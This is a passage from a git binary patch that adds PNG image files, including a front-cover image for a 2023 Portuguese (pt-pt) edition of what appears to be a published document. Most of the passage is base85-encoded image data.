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 literal 0 HcmV?d00001 diff --git a/editions/2023/pt-pt/images/front-cc.png b/editions/2023/pt-pt/images/front-cc.png new file mode 100644 index 0000000000000000000000000000000000000000..45f1398042a7a898c57f00ba6fd279993379926d GIT binary patch literal 5584 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 